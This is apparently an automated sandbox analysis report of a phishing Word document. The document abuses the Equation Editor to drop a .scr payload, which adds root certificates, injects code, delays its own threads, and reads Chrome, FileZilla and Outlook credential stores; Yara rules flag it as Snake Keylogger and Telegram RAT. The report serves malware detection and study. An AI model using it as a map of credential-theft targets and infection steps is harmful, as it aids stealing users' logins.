Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: mpoom[1].scr.2.dr

Static PE information: 0x9F140DDE [Tue Jul 28 22:46:54 2054 UTC]

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346E33 push esi; ret	2_2_00346E37
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0034683F push esi; ret	2_2_00346843
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346839 push esi; ret	2_2_0034683B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346A24 push ebp; ret	2_2_00346A27
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0034902C push esp; ret	2_2_003491F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346E2B push esi; ret	2_2_00346E2F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00333E19 push cs; iretd	2_2_00333E1C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346E0C push esi; ret	2_2_00346E27
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346471 push esi; ret	2_2_00346473
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346478 push esi; ret	2_2_0034647B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346A63 push ebp; ret	2_2_00346A67
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346A6B push ebp; ret	2_2_00346A6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0034445D push ebp; ret	2_2_0034445F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346A40 push ebp; ret	2_2_00346A5F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00349041 push esp; ret	2_2_003491F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003464B7 push esi; ret	2_2_003464BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003464BF push esi; ret	2_2_003464C3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003464AA push esi; ret	2_2_003464B3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00348895 push ebp; ret	2_2_00348897
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346882 push esi; ret	2_2_00346883
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0034888D push ebp; ret	2_2_0034888F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00346888 push esi; ret	2_2_0034688B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003490D4 push esp; ret	2_2_003491F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003462D6 push ebx; ret	2_2_003462D7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003462DE push ebx; ret	2_2_003462DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003462CE push ebx; ret	2_2_003462CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0033A32E push eax; retn 0033h	2_2_0033A349
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00344D10 push esp; ret	2_2_00345057
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00338F59 push eax; retf	2_2_00338F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00348FB1 push esp; ret	2_2_003491F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003301F4 push eax; retf	2_2_003301F5

Source: mpoom[1].scr.2.dr	Static PE information: section name: .text entropy: 7.638064581182766
Source: mpoom39002.scr.2.dr	Static PE information: section name: .text entropy: 7.638064581182766

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\mpoom39002.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\mpoom39002.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 2200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 1F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 2C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr TID: 3236	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr TID: 3312	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3468	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Code function: 6_2_001F608D LdrInitializeThunk,

6_2_001F608D

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Memory written: C:\Users\user\AppData\Roaming\mpoom39002.scr base: 80000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Queries volume information: C:\Users\user\AppData\Roaming\mpoom39002.scr VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Queries volume information: C:\Users\user\AppData\Roaming\mpoom39002.scr VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior

